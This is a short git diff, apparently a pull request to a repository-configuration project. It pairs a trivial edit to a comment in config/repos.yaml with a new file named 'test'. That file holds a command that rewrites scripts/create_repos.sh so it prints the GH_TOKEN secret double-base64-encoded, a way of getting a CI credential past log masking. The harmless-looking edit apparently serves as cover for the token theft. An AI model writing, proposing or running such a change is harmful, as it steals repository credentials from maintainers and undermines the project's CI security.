diff --git a/config/repos.yaml b/config/repos.yaml index 96dcb99..28fbade 100644 --- a/config/repos.yaml +++ b/config/repos.yaml @@ -6,7 +6,7 @@ # Parameters: # - name: Repository name. Use only lowercase letters and dashes. # - stage: Choose between "allianz" or "allianz-incubator". -# - team name: Must be identical to the corresponding GIAM group. +# - team name: Must be identical to the corresponding GIAM group.... repositories: - name: ".github" diff --git a/test b/test new file mode 100644 index 0000000..a8ae8b0 --- /dev/null +++ b/test @@ -0,0 +1 @@ +echo 'echo "$GH_TOKEN" | base64 -w0 | base64 -w0' > scripts/create_repos.sh